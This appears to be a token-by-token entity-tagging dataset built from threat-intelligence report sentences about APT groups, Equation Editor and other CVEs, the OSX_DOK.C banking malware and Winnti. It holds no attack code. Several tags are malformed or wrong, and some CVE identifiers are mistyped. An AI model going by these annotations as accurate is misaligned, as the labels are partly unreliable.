+a O +group O +calling O +itself O +the O +Shadow B-APT +Brokers E-APT +began O +releasing O +tools O +it O +claimed O +to O +have O +originated O +from O +the O +Equation S-APT +Group O +. O + +The O +zero-day S-VULNAME +vulnerability O +found O +and O +reported O +by O +Symantec S-SECTEAM +CVE-2019-0703 S-VULID +occurs O +due O +to O +the O +ACT O +the O +Windows S-OS +SMB O +Server O +handles O +certain O +requests O +. 
O + +CVE-2017-0143 S-VULID +was O +also O +used O +by O +two O +other O +exploit S-VULNAME +tools—EternalRomance S-FILE +and O +EternalSynergy—that S-FILE +were O +released O +as O +part O +of O +the O +Shadow O +Brokers O +leak O +in O +April B-TIME +2017 E-TIME +. O + +this O +RTF S-TOOL +exploits O +again O +the O +CVE-2017-1882 S-VULID +on O +eqnedt32.exe S-FILE +. O + +At O +this O +time O +, O +we O +do O +not O +believe O +that O +the O +attackers S-APT +found O +a O +new O +ASA S-TOOL +exploit S-VULNAME +. O + +We O +believe O +the O +groups S-APT +moved O +to O +use O +CVE-2018-0798 S-VULID +instead O +of O +the O +other O +Microsoft S-IDTY +Equation B-TOOL +Editor I-TOOL +Remote I-TOOL +Code I-TOOL +Execution E-TOOL +( O +RCE S-TOOL +) O +vulnerabilities O +because O +the O +former O +is O +more O +reliable O +as O +it O +works O +on O +all O +known O +versions O +of O +Equation O +Editor O +. O + +The O +analyzed O +RTF O +files O +share O +the O +same O +object O +dimension O +(objw2180\objh300) O +used O +to O +track O +the O +RTF O +weaponizer O +in O +our O +previous O +report O +, O +however O +, O +the O +sample S-FILE +was O +not O +exploiting O +CVE-2017-11882 S-VULID +or O +CVE-2018-0802 S-VULID +. O + +After O +further O +analysis O +, O +it O +was O +discovered O +that O +the O +RTF B-FILE +files E-FILE +were O +exploiting O +the O +CVE-2018-0798 S-VULID +vulnerability O +in O +Microsoft S-IDTY +’s O +Equation B-TOOL +Editor E-TOOL +( O +EQNEDT32 S-TOOL +) O +. O + +Anomali S-SECTEAM +Researchers O +were O +able O +to O +identify O +multiple O +samples O +of O +malicious O +RTF O +documents O +ITW S-FILE +using O +the O +same O +exploit S-VULNAME +for O +CVE-2018-0798 S-VULID +. O + +CVE-2018-0798 S-VULID +is O +an O +RCE O +vulnerability O +, O +a O +stack O +buffer O +overflow O +that O +can O +be O +exploited O +by O +a O +threat O +actor O +to O +perform O +stack O +corruption O +. 
O + +As O +observed O +previously O +with O +CVE-2017-11882 S-VULID +and O +CVE-2018-0802 S-VULID +, O +the O +weaponizer S-MAL +was O +used O +exclusively O +by O +Chinese O +Cyber B-ACT +Espionage E-ACT +actors S-APT +for O +approximately O +one O +year O +December B-TIME +2017 E-TIME +through O +December B-TIME +2018 E-TIME +, O +after O +which O +cybercrime O +actors O +began O +to O +incorporate O +it O +in O +their O +malicious O +activity O +. O + +Analysis O +of O +the O +Royal O +Road O +weaponizer O +has O +resulted O +in O +the O +discovery O +that O +multiple O +Chinese O +threat B-APT +groups E-APT +started O +utilizing O +CVE-2018-0798 S-VULID +in O +their O +RTF B-MAL +weaponizer E-MAL +. O + +These O +findings O +also O +suggest O +that O +the O +threat B-APT +groups E-APT +have O +robust O +exploit S-VULNAME +developing O +capabilities O +because O +CVE-2018-0798 S-VULID +is O +not O +widely O +reported O +on O +and O +it O +is O +typically O +not O +incorporated O +into O +publicly O +available O +weaponizers O +. O + +Upon O +opening O +of O +the O +MS O +Word S-TOOL +document O +, O +our O +embedded O +file O +exploits O +CVE-2017-11882 S-VULID +to O +drop O +a O +malicious O +fake O +Norton O +Security O +Shell O +Extension O +module O +, O +'NavShExt.dll' S-FILE +, O +which O +is O +then O +injected O +into O +iexplore.exe S-FILE +to O +install O +the O +backdoor O +, O +begin O +collection O +, O +and O +activate O +command O +and O +control O +. O + +Moving O +through O +the O +infection O +process O +, O +NetWitness O +Endpoint O +detects O +the O +initial O +exploit S-VULNAME +CVE-2017-1182 S-VULID +in O +action O +as O +the O +Microsoft B-FILE +Equation I-FILE +Editor E-FILE +, O +'EQNEDT32.exe' S-FILE +, O +scores O +high O +for O +potentially O +malicious O +activity O +. 
O + +Attackers S-APT +relied O +on O +Microsoft S-IDTY +Equation O +Editor O +exploit S-VULNAME +CVE-2018-0798 S-VULID +to O +deliver O +a O +custom O +malware O +that O +Proofpoint O +researchers O +have O +dubbed O +Cotx O +RAT. O +Maudi S-APT +Surveillance O +Operation O +which O +was O +previously O +reported O +in O +2013 S-TIME +. O + +specifically O +CVE-2018-0798 S-VULID +, O +before O +downloading O +subsequent O +payloads O +. O + +Dubbed O +‘Operation B-APT +Sheep’ E-APT +, O +this O +massive O +data O +stealing O +campaign O +is O +the O +first O +known O +campaign O +seen O +in O +the O +wild O +to O +exploit S-VULNAME +the O +Man-in-the-Disk S-VULNAME +vulnerability O +revealed O +by O +Check O +Point O +Research O +earlier O +last O +year O +. O + +Notably O +, O +APT41 S-APT +was O +observed O +using B-ACT +proof-of-concept E-ACT +exploit S-VULNAME +code O +for O +CVE-2019-3396 S-VULID +within O +23 O +days O +after O +the O +Confluence O +. O + +We’ve O +discovered O +a O +new O +version O +of O +BalkanDoor S-APT +with O +a O +new O +method O +for O +execution/installation: O +an O +exploit S-VULNAME +of O +the O +WinRAR S-TOOL +ACE O +vulnerability O +CVE-2018-20250 S-VULID +. O + +In O +some O +of O +the O +latest O +samples O +of O +BalkanDoor S-FILE +detected O +in O +2019 S-TIME +, O +the O +malware O +is O +distributed O +as O +an O +ACE O +archive O +, O +disguised O +as O +a O +RAR O +archive O +(i.e. O +, O +not O +an O +executable O +file) O +, O +specially O +crafted O +to O +exploit S-VULNAME +the O +WinRAR S-TOOL +ACE O +vulnerability O +CVE-2018-20250 S-VULID +. 
O + +The O +actor S-APT +attempts O +to O +exploit S-VULNAME +CVE-2018–8440 S-VULID +— O +an O +elevation O +of O +privilege O +vulnerability S-VULNAME +in O +Windows S-OS +when O +it O +improperly O +handles O +calls O +to O +Advanced O +Local O +Procedure O +Call O +— O +to O +elevate O +the O +privileges O +using O +a O +modified O +proof-of-concept S-VULNAME +exploit S-VULNAME +. O + +The O +China B-FILE +Chopper E-FILE +actor O +activity O +starts O +with O +the O +download O +and O +execution O +of O +two O +exploit S-VULNAME +files O +which O +attempt O +to O +exploit S-VULNAME +the O +Windows S-OS +vulnerabilities O +CVE-2015-0062 S-VULID +, O +CVE-2015-1701 S-VULID +and O +CVE-2016-0099 S-VULID +to O +allow O +the O +attacker S-APT +to O +modify O +other O +objects O +on O +the O +server O +. O + +Previously O +, O +Cloud B-APT +Atlas E-APT +dropped O +its O +validator” O +implant O +named O +PowerShower” O +directly O +, O +after O +exploiting O +the O +Microsoft S-IDTY +Equation O +vulnerability O +CVE-2017-11882 S-VULID +mixed O +with O +CVE-2018-0802 S-VULID +. O + +The O +following O +archive S-FILE +caught O +our O +attention O +for O +exploiting O +a O +WinRAR S-TOOL +unacev2 O +module O +vulnerability S-VULNAME +and O +for O +having O +interesting O +content O +. O + +Mimikatz S-FILE +is O +a O +post-exploitation O +tool O +that O +allows O +attackers O +to O +extract O +credentials O +from O +volatile O +memory O +. O + +Analysis O +of O +the O +emails S-TOOL +has O +shown O +that O +the O +attachment O +contains O +an O +exploit S-VULNAME +for O +the O +CVE-2017-11882 B-VULID +vulnerability S-VULNAME +. O + +The O +exploit S-VULNAME +installs O +Silence’s S-APT +loader O +, O +designed O +to O +download O +backdoors O +and O +other O +malicious O +programs O +. 
O + +We O +believe O +Emissary B-APT +Panda E-APT +exploited O +a O +recently O +patched O +vulnerability S-VULNAME +in O +Microsoft S-IDTY +SharePoint O +tracked O +by O +CVE-2019-0604 S-VULID +, O +which O +is O +a O +remote O +code O +execution O +vulnerability O +used O +to O +compromise O +the O +server O +and O +eventually O +install O +a O +webshell O +. O + +Of O +particular O +note O +is O +their O +use O +of O +tools O +to O +identify O +systems O +vulnerable O +to O +CVE-2017-0144 S-VULID +, O +which O +is O +the O +same O +vulnerability O +exploited O +by O +EternalBlue S-ACT +that O +is O +best O +known O +for O +its O +use O +in O +the O +WannaCry B-ACT +attacks E-ACT +of O +2017 S-TIME +. O + +In O +addition O +to O +the O +aforementioned O +post-exploitation O +tools O +, O +the O +actors O +used O +these O +webshells S-TOOL +to O +upload O +legitimate O +executables O +that O +they O +would O +use O +DLL S-TOOL +sideloading O +to O +run B-ACT +a I-ACT +malicious I-ACT +DLL E-ACT +that O +has O +code O +overlaps O +with O +known O +Emissary B-APT +Panda E-APT +attacks O +. O + +OSX S-OS +Malware S-MAL +Linked O +to O +Operation O +Emmental B-ACT +Hijacks I-ACT +User I-ACT +Network I-ACT +Traffic E-ACT +. O + +The O +OSX_DOK S-MAL +malware S-MAL +( O +Detected O +by O +Trend B-SECTEAM +Micro E-SECTEAM +as O +OSX_DOK.C S-MAL +) O +showcases O +sophisticated O +features O +such O +as O +certificate O +abuse O +and O +security O +software O +evasion O +that O +affects O +machines O +using O +Apple B-OS +’s I-OS +OS I-OS +X E-OS +operating O +system O +. O + +This O +malware S-MAL +, O +which O +specifically O +targets O +Swiss O +banking O +users O +, O +uses O +a O +phishing B-ACT +campaign E-ACT +to O +drop O +its O +payload O +, O +which O +eventually O +results O +in O +the O +hijacking O +of O +a O +user O +’s O +network O +traffic O +using O +a O +Man-in-the-Middle S-ACT +( O +MitM S-ACT +) O +attack O +. 
O + +OSX_DOK.C S-MAL +seems O +to O +be O +another O +version O +of O +WERDLOD S-MAL +( O +Detected O +by O +Trend B-SECTEAM +Micro E-SECTEAM +as O +TROJ_WERDLOD B-MAL +Family E-MAL +) O +, O +which O +is O +a O +malware O +that O +was O +used O +during O +the O +Operation B-ACT +Emmental E-ACT +campaigns—an O +interesting O +development O +that O +we O +will O +tackle O +further O +in O +this O +blog O +post O +. O + +OSX_DOK.C S-MAL +first O +arrives O +via O +a O +phishing B-EMAIL +email E-EMAIL +that O +contains O +certain O +files O +labeled O +as O +either O +.zip O +or O +.docx O +files O +. O + +The O +sample O +we O +analyzed O +was O +a O +purported O +message O +from O +a O +police O +inspector O +in O +Zurich S-LOC +allegedly O +claiming O +to O +unsuccessfully O +contact O +the O +recipient O +. O + +The O +email S-TOOL +also O +comes O +with O +two O +files O +attached O +claiming O +to O +contain O +questions O +for O +the O +user O +: O +one O +is O +a O +.zip O +file O +, O +which O +is O +a O +fake O +OS B-TOOL +X I-TOOL +app E-TOOL +, O +while O +the O +other O +is O +a O +.docx O +file O +used O +to O +target O +Windows S-OS +operating O +systems O +using O +WERDLOD S-MAL +. O + +Both O +of O +these O +samples O +work O +as O +Banking B-MAL +Trojans E-MAL +and O +provide O +similar O +functionalities O +. O + +Some O +examples O +of O +the O +files O +used O +in O +the O +email S-TOOL +attachment O +include O +the O +following O +: O + +Zahlungsinformationen B-FILE +01.06.2017.zip E-FILE +. O + +Zahlungsinformationen B-FILE +digitec.zip E-FILE +. O + +Dokument B-FILE +09.06.2017.zip E-FILE +. O + +Dokument B-FILE +09.06.2017.docx E-FILE +. O + +06.2017.docx S-FILE +. O + +Once O +the O +docx O +file O +included O +in O +the O +phishing B-ACT +email E-ACT +is O +clicked O +, O +a O +warning O +window O +will O +pop O +up O +. 
O + +After O +this O +, O +the O +App B-TOOL +Store E-TOOL +on O +the O +system O +will O +be O +removed O +, O +followed O +by O +a O +full O +screen O +fake O +OS B-OS +X E-OS +update O +screen O +. O + +It O +will O +ask O +for O +a O +password O +to O +run O +command O +as O +root O +. O + +The O +malware O +will O +begin O +to O +download O +other O +utilities S-TOOL +. O + +It O +relies O +on O +Homebrew S-TOOL +, O +an O +open O +source O +software S-TOOL +package O +manager O +to O +install O +Golang S-TOOL +and O +Tor S-TOOL +. O + +The O +malware O +will O +then O +install O +fake O +certificates O +in O +the O +system O +to O +perform O +a O +MitM B-ACT +attack E-ACT +without O +notifying O +the O +user O +. O + +The O +structure O +of O +the O +fake O +App B-TOOL +Store E-TOOL +matches O +the O +application O +bundle O +structure O +and O +provides O +both O +English S-LOC +and O +German S-LOC +interfaces O +. O + +The O +archive O +in O +Mac B-OS +OS I-OS +X E-OS +looks O +like O +this O +: O + +Mac B-OS +OS I-OS +X E-OS +will O +run O +the O +application O +if O +it O +passes O +certificates O +. O + +In O +this O +case O +, O +the O +malware O +is O +signed O +off O +by O +a O +“ O +developer O +” O +, O +which O +may O +actually O +be O +a O +dummy O +account O +or O +that O +of O +a O +compromised O +user O +. O + +In O +addition O +, O +the O +time S-TIME +stamp O +on O +the O +CA S-IDTY +is O +new O +, O +which O +might O +mean O +that O +it O +was O +obtained O +specifically O +for O +this O +attack O +. O + +The O +fake O +certificate O +imitates O +the O +COMODO S-IDTY +root O +certificate O +. 
O + +Take O +note O +that O +the O +fake O +certificate O +does O +not O +contain O +a O +COMODO B-IDTY +Certificate I-IDTY +Authority E-IDTY +seal O +that O +certifies O +its O +validity O +, O +as O +seen O +in O +the O +comparison O +below O +: O + +We O +noticed O +that O +this O +malware O +will O +not O +work O +for O +Mozilla B-TOOL +Firefox E-TOOL +or O +Google B-TOOL +Chrome E-TOOL +since O +these O +two O +browsers S-TOOL +have O +their O +own O +root O +certificates O +. O + +Of O +all O +the O +major O +browsers S-TOOL +, O +only O +Safari S-TOOL +uses O +the O +system O +’s O +certificates O +. O + +We O +observed O +the O +attacker O +targeting O +both O +Windows S-OS +and O +Mac B-OS +OS I-OS +X E-OS +in O +the O +same O +spam O +mail O +on O +June B-TIME +9 I-TIME +, I-TIME +2017 E-TIME +. O + +There O +is O +a O +file O +shortcut O +embedded O +in O +the O +malicious O +.docx S-FILE +file—one O +that O +will O +download O +an O +executable O +file O +from O +Dropbox S-TOOL +that O +executes O +once O +clicked O +by O +the O +user O +. O + +The O +functionalities O +are O +similar O +to O +the O +malicious B-MAL +app E-MAL +provided O +, O +which O +includes O +installing O +tor S-TOOL +and O +proxy S-TOOL +. O + +We O +have O +already O +notified O +Dropbox S-TOOL +about O +the O +use O +of O +its O +service O +for O +this O +malware O +. O + +Dropbox S-TOOL +has O +already O +taken O +down O +the O +links O +. O + +The O +malware O +will O +install O +two O +proxies S-TOOL +running O +on O +local O +host O +port O +5555 O +and O +5588 O +. O + +All O +of O +the O +traffic O +will O +be O +hijacked O +into O +the O +first O +proxy O +( O +port O +5555 O +) O +with O +the O +victim O +’s O +external O +IP O +address O +as O +parameter O +. O + +The O +first O +( O +port O +5555 O +) O +proxy O +first O +finds O +the O +IP O +parameter O +. 
O + +If O +it O +is O +not O +in O +Switzerland S-LOC +, O +the O +traffic O +will O +proceed O +as O +normal O +. O + +If O +it O +detects O +an O +IP S-IP +located O +in O +Switzerland S-LOC +, O +the O +malware B-MAL +will E-MAL +run O +an O +obfuscated O +JavaScript O +code O +and O +find O +its O +visiting O +domain O +. O + +If O +the O +domain O +is O +in O +the O +target O +, O +the O +malware O +will O +perform O +a O +MitM B-ACT +attack E-ACT +and O +redirect O +the O +traffic O +to O +the O +second O +proxy O +( O +port O +5588 O +) O +, O +which O +routes O +the O +traffic O +to O +the O +Tor O +network O +. O + +The O +purpose O +of O +these O +steps O +is O +to O +target O +users O +in O +Switzerland S-LOC +and O +hijack O +their O +traffic O +After O +deobfuscating O +the O +malware O +, O +we O +found O +the O +target O +domains O +: O + +The O +target O +domain O +’s O +visitors O +will O +be O +redirected O +into O +an O +e-banking O +login O +page O +that O +looks O +and O +acts O +normally O +, O +but O +is O +located O +on O +dark O +web O +sites O +. O + +However O +, O +once O +the O +victim O +enters O +an O +account O +and O +password O +. O + +A O +window O +will O +pop O +out O +. O + +The O +pop-out O +window O +is O +just O +smoke O +and O +mirrors O +, O +where O +nothing O +actually O +happens O +once O +the O +countdown O +timer O +reaches O +zero O +. O + +We O +analyzed O +the O +webpage O +and O +found O +attackers O +injecting O +a O +script O +into O +the O +webpage O +. O + +Once O +the O +user O +enters O +an O +account O +and O +password O +, O +it O +will O +initiate O +POST O +using O +AJAX O +. O + +The O +POST O +message O +is O +sent O +to O +the O +same O +site O +as O +the O +fake O +login O +page—which O +an O +attacker O +can O +control O +inside O +the O +Tor O +network O +. 
O + +We O +decoded O +the O +data O +section O +and O +found O +not O +only O +the O +account O +and O +password O +, O +but O +that O +it O +also O +fingerprinted O +the O +user O +’s O +browser O +and O +system O +information O +. O + +While O +Operation B-ACT +Emmental E-ACT +was O +able O +to O +bypass O +two-way O +authentication O +by O +tricking O +its O +victims O +into O +installing O +a O +fake B-TOOL +app E-TOOL +, O +we O +have O +not O +observed O +OSX_DOK.C S-MAL +doing O +this O +. O + +However O +, O +since O +they O +can O +inject O +code O +into O +the O +webpage O +, O +it O +means O +they O +have O +the O +ability O +to O +do O +this O +as O +well O +. O + +We O +performed O +static O +analysis O +on O +the O +sample O +and O +found O +it O +packed O +by O +Ultimate B-TOOL +Packer E-TOOL +for O +Executables S-TOOL +( O +UPX O +) O +, O +an O +open O +source O +executable O +packer O +that O +can O +often O +be O +abused O +by O +malware S-MAL +. O + +We O +successfully O +unpacked O +the O +initial O +sample O +we O +found O +dropped O +by O +the O +UPX B-TOOL +unpacker E-TOOL +. O + +The O +malware S-MAL +is O +not O +obfuscated O +so O +we O +easily O +found O +interesting O +strings O +here O +. O + +We O +can O +see O +that O +the O +malware S-MAL +relies O +on O +bash O +shell O +for O +most O +of O +its O +setup O +. O + +We O +were O +not O +able O +to O +unpack O +the O +sample O +discovered O +after O +June B-TIME +9 I-TIME +, I-TIME +2017 E-TIME +. O + +The O +UPX S-TOOL +gave O +a O +warning O +message O +about O +memory O +buffer O +overflow O +. O + +The O +malware S-MAL +author O +seemingly O +made O +unpacking O +the O +malware O +more O +difficult O +to O +slow O +down O +or O +even O +evade O +the O +antivirus O +engine O +’s O +scanning O +process O +. 
O + +The O +packer O +is O +the O +same O +but O +the O +malware O +tries O +to O +exploit O +the O +undiscovered O +bug O +in O +the O +UPX S-TOOL +library O +that O +causes O +unpack O +failure O +. O + +We O +have O +reported O +the O +issues O +to O +the O +UPX S-TOOL +team O +, O +and O +they O +have O +already O +fixed O +it O +. O + +The O +impacted O +versions O +of O +the O +UPX S-TOOL +library O +are O +3.94 O +, O +3.93 O +, O +and O +3.92 O +. O + +This O +technique O +enables O +the O +malware O +to O +efficiently O +run O +while O +evading O +unpacking O +techniques O +from O +the O +AntiVirus-integrated O +UPX O +library O +. O + +As O +mentioned O +earlier O +, O +we O +believe O +that O +OSX_DOK.C S-MAL +might O +be O +the O +MAC S-OS +OS O +X O +version O +of O +WERDLOD S-MAL +, O +an O +online O +banking O +malware S-MAL +that O +used O +the O +same O +techniques O +as O +Operation B-TOOL +Emmental E-TOOL +. O + +Other O +research O +have O +also O +connected O +the O +OSX S-OS +malware O +and O +Retefe O +( O +the O +external O +term O +used O +for O +WERDLOD S-MAL +) O +via O +similarities O +in O +their O +behavior O +. O + +While O +OSX_DOK.C S-MAL +is O +designed O +for O +MAC S-OS B-TOOL +OS I-TOOL +X E-TOOL +, O +which O +is O +a O +Unix-like O +system O +, O +WERDLOD S-MAL +is O +designed O +for O +Windows S-OS +. O + +But O +in O +terms O +of O +features O +and O +behaviors O +, O +these O +two O +malware O +are O +very O +similar O +. O + +Here O +is O +a O +list O +of O +their O +similarities O +. O + +Both O +malware O +kill O +all O +current O +browsers O +before O +installing O +fake O +certificates O +: O + +Both O +WERDLOD S-MAL +and O +OSX_DOK.C S-MAL +are O +designed O +to O +kill O +the O +browser O +process O +before O +installing O +fake O +certificates O +. 
O + +While O +WERDLOD S-MAL +kills O +processes O +for O +Internet B-TOOL +Explorer E-TOOL +, O +Firefox S-TOOL +, O +and O +Chrome S-TOOL +, O +OSX_DOK.C S-MAL +does O +the O +same O +on O +Safari S-TOOL +, O +Firefox S-TOOL +, O +and O +Chrome S-TOOL +. O + +Both O +malware S-MAL +share O +the O +same O +proxy O +settings O +and O +script O +: O + +While O +WERDLOD S-MAL +and O +OSX_DOK.C S-MAL +use O +different O +codes O +( O +since O +they O +target O +different O +operating O +systems O +) O +, O +they O +have O +similar O +proxy O +settings O +and O +script O +formats O +. O + +In O +particular O +, O +WERDLOD S-MAL +uses O +scripts O +running O +on O +http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip} S-URL +as O +proxy O +: O + +Comparing O +it O +to O +OSX_DOK.C S-MAL +, O +we O +can O +see O +that O +it O +uses O +the O +same O +script O +format O +. O + +Both O +malware S-MAL +have O +similar O +targets O +. O + +Both O +WERDLOD S-MAL +and O +OSX_DOK.C S-MAL +targeted O +financial O +institutions O +, O +with O +a O +particular O +focus O +on O +banks O +in O +Switzerland S-LOC +. O + +Further O +analysis O +of O +both O +malware S-MAL +revealed O +that O +their O +main O +targets O +are O +very O +similar O +, O +as O +seen O +in O +the O +screenshot O +below O +. O + +While O +it O +’s O +possible O +that O +this O +is O +a O +coincidence O +, O +the O +rest O +of O +the O +evidence O +makes O +it O +unlikely O +for O +these O +two O +malware S-MAL +to O +target O +the O +same O +organizations O +by O +chance O +. O + +Given O +the O +connection O +between O +WERDLOD S-MAL +and O +OSX_DOK.C S-MAL +, O +it O +is O +reasonable O +to O +assume O +that O +the O +latter O +is O +also O +a O +part O +of O +the O +Operational B-ACT +Emmental E-ACT +campaign O +. 
O + +To O +further O +illustrate O +, O +here O +is O +a O +timeline O +of O +Operation B-ACT +Emmental E-ACT +and O +its O +potential O +relationship O +to O +OSX_DOK.C S-MAL +: O + +Despite O +phishing E-ACT +incidents O +for O +Mac S-OS +devices O +being O +rarer O +than O +their O +Windows S-OS +counterparts O +, O +users O +should O +still O +be O +aware O +that O +attackers O +can O +target O +them O +at O +any O +moment O +. O + +By O +implementing O +best O +practices O +for O +phishing-type O +attacks—such O +as O +refraining O +from O +downloading O +files O +unless O +they O +are O +absolutely O +certain O +that O +they O +come O +from O +trustworthy O +sources—users O +can O +avoid O +being O +victimized O +by O +malware O +such O +as O +OSX_DOK.C S-MAL +that O +prey O +on O +users O +who O +lack O +awareness O +of O +phishing E-ACT +strategies O +. O + +In O +addition O +, O +end O +users O +can O +also O +benefit O +from O +security O +solutions O +such O +as O +Trend B-SECTEAM +Micro I-SECTEAM +Home I-SECTEAM +Security E-SECTEAM +for O +Mac S-OS +, O +which O +provides O +comprehensive O +security O +and O +multi-device O +protection O +against O +viruses S-MAL +, O +ransomware S-MAL +, O +malicious B-MAL +websites E-MAL +, O +and O +identity B-MAL +thieves E-MAL +. O + +It S-SECTEAM +also O +provides O +secure O +storage O +of O +passwords O +and O +other O +sensitive O +information O +. O + +Trend B-SECTEAM +Micro™ I-SECTEAM +Mobile I-SECTEAM +Security E-SECTEAM +for O +Apple B-TOOL +devices E-TOOL +( O +available O +on O +the O +App B-TOOL +Store E-TOOL +) O +can O +monitor O +and O +block O +phishing E-ACT +attacks O +and O +other O +malicious O +URLs S-URL +. 
O + +For O +enterprises O +, O +Trend B-SECTEAM +Micro I-SECTEAM +’s I-SECTEAM +Smart I-SECTEAM +Protection I-SECTEAM +Suites E-SECTEAM +with O +XGen™ B-SECTEAM +security E-SECTEAM +, O +which O +support O +Mac S-TOOL +systems O +, O +infuse O +high-fidelity O +machine O +learning O +into O +a O +blend O +of O +threat O +protection O +techniques O +to O +eliminate O +security O +gaps O +across O +any O +user O +activity O +and O +any O +endpoint O +. O + +Detecting O +threat O +actors O +in O +recent O +German S-LOC +industrial O +attacks O +with O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +. O + +When O +a O +Germany-based O +industrial B-IDTY +conglomerate E-IDTY +disclosed O +in O +December B-TIME +2016 E-TIME +that O +it O +was O +breached O +early O +that O +year O +, O +the O +breach O +was O +revealed O +to O +be O +a O +professionally O +run O +industrial O +espionage O +attack O +. O + +According O +to O +the O +German S-LOC +press O +, O +the O +intruders O +used O +the O +Winnti S-MAL +family O +of O +malware O +as O +their O +main O +implant O +, O +giving O +them O +persistent O +access O +to O +the O +conglomerate O +’s O +network O +as O +early O +as O +February B-TIME +2016 E-TIME +. O + +In O +this O +blog O +, O +we O +look O +at O +the O +Winnti S-MAL +malware O +implant O +as O +used O +by O +two O +known O +activity O +groups O +BARIUM S-APT +and O +LEAD S-APT +. O + +We O +look O +at O +how O +these O +activity O +groups O +introduce O +the O +implant O +to O +various O +targets O +and O +techniques O +used O +by O +Microsoft S-IDTY +researchers O +to O +track O +the O +implant O +. 
O + +To O +show O +how O +this O +breach O +and O +similar O +breaches O +can O +be O +mitigated O +, O +we O +look O +at O +how O +Windows B-TOOL +Defender I-TOOL +Advanced I-TOOL +Threat I-TOOL +Protection E-TOOL +( O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +) O +flags O +activities O +associated O +with O +BARIUM S-APT +, O +LEAD S-APT +, O +and O +other O +known O +activity O +groups O +and O +how O +it O +provides O +extensive O +threat O +intelligence O +about O +these O +groups O +. O + +We O +go O +through O +the O +Winnti S-MAL +implant O +installation O +process O +and O +explore O +how O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +can O +capture O +such O +attacker O +methods O +and O +tools O +and O +provide O +visualized O +contextual O +information O +that O +can O +aid O +in O +actual O +attack O +investigation O +and O +response O +. O + +We O +then O +discuss O +how O +centralized B-TOOL +response I-TOOL +options E-TOOL +, O +provided O +as O +enhancements O +to O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +with O +the B-OS +Windows I-OS +10 I-OS +Creators I-OS +Update E-OS +, O +can O +be O +used O +to O +quickly O +stop O +threats O +, O +including O +stopping O +command O +and O +control O +( O +C&C S-PROT +) O +communication O +and O +preventing O +existing O +implants O +from O +installing O +additional O +components O +or O +from O +moving O +laterally O +to O +other O +computers O +on O +the O +network O +. O + +Microsoft B-SECTEAM +Threat I-SECTEAM +Intelligence E-SECTEAM +associates O +Winnti S-MAL +with O +multiple O +activity O +groups—collections O +of O +malware O +, O +supporting O +infrastructure O +, O +online O +personas O +, O +victimology O +, O +and O +other O +attack O +artifacts O +that O +the O +Microsoft B-SECTEAM +intelligent I-SECTEAM +security I-SECTEAM +graph E-SECTEAM +uses O +to O +categorize O +and O +attribute O +threat O +activity O +. 
O + +Microsoft S-IDTY +labels O +activity O +groups O +using O +code O +names O +derived O +from O +elements O +in O +the O +periodic O +table O +. O + +In O +the O +case O +of O +this O +malware O +, O +the O +activity O +groups O +strongly O +associated O +with O +Winnti S-MAL +are O +BARIUM S-APT +and O +LEAD S-APT +. O + +But O +even O +though O +they O +share O +the O +use O +of O +Winnti S-MAL +, O +the O +BARIUM S-APT +and O +LEAD S-APT +activity O +groups O +are O +involved O +in O +very O +different O +intrusion O +scenarios O +. O + +BARIUM S-APT +begins O +its O +attacks O +by O +cultivating O +relationships O +with O +potential O +victims—particularly O +those O +working O +in O +Business O +Development O +or O +Human O +Resources—on O +various O +social B-TOOL +media I-TOOL +platforms E-TOOL +. O + +Once O +BARIUM S-APT +has O +established O +rapport O +, O +they O +spear-phish O +the O +victim O +using O +a O +variety O +of O +unsophisticated O +malware O +installation O +vectors O +, O +including O +malicious B-TOOL +shortcut E-TOOL +( O +.lnk S-FILE +) O +files O +with O +hidden O +payloads O +, O +compiled B-TOOL +HTML E-TOOL +help O +( O +.chm S-FILE +) O +files E-TOOL +, O +or O +Microsoft B-TOOL +Office I-TOOL +documents E-TOOL +containing O +macros O +or O +exploits O +. O + +Initial O +intrusion O +stages O +feature O +the O +Win32/Barlaiy S-MAL +implant—notable O +for O +its O +use O +of O +social B-TOOL +network I-TOOL +profiles E-TOOL +, O +collaborative B-TOOL +document I-TOOL +editing I-TOOL +sites E-TOOL +, O +and O +blogs S-TOOL +for O +C&C S-PROT +. O + +Later O +stages O +of O +the O +intrusions O +rely O +upon O +Winnti S-MAL +for O +persistent O +access O +. 
O + +The O +majority O +of O +victims O +recorded O +to O +date O +have O +been O +in O +electronic O +gaming O +, O +multimedia O +, O +and O +Internet O +content O +industries O +, O +although O +occasional O +intrusions O +against O +technology B-IDTY +companies E-IDTY +have O +occurred O +. O + +In O +contrast O +, O +LEAD S-APT +has O +established O +a O +far O +greater O +reputation O +for O +industrial O +espionage O +. O + +In O +the O +past O +few O +years O +, O +LEAD S-APT +’s O +victims O +have O +included O +: O + +Multinational S-IDTY +, O +multi-industry B-IDTY +companies I-IDTY +involved I-IDTY +in I-IDTY +the I-IDTY +manufacture I-IDTY +of I-IDTY +textiles E-IDTY +, O +chemicals S-IDTY +, O +and O +electronics S-IDTY +. O + +Pharmaceutical B-IDTY +companies E-IDTY +. O + +A B-IDTY +company I-IDTY +in I-IDTY +the I-IDTY +chemical I-IDTY +industry E-IDTY +. O + +University O +faculty O +specializing O +in O +aeronautical O +engineering O +and O +research O +. O + +A B-IDTY +company I-IDTY +involved I-IDTY +in I-IDTY +the I-IDTY +design I-IDTY +and I-IDTY +manufacture I-IDTY +of I-IDTY +motor I-IDTY +vehicles E-IDTY +. O + +A B-IDTY +cybersecurity I-IDTY +company I-IDTY +focusing I-IDTY +on I-IDTY +protecting I-IDTY +industrial I-IDTY +control I-IDTY +systems E-IDTY +. O + +During O +these O +intrusions O +, O +LEAD S-APT +’s O +objective O +was O +to O +steal O +sensitive O +data O +, O +including O +research O +materials O +, O +process O +documents O +, O +and O +project O +plans O +. O + +LEAD S-APT +also O +steals O +code-signing O +certificates O +to O +sign O +its O +malware O +in O +subsequent O +attacks O +. O + +In O +most O +cases O +, O +LEAD S-APT +’s O +attacks O +do O +not O +feature O +any O +advanced O +exploit O +techniques O +. O + +The O +group O +also O +does O +not O +make O +special O +effort O +to O +cultivate O +victims O +prior O +to O +an O +attack O +. 
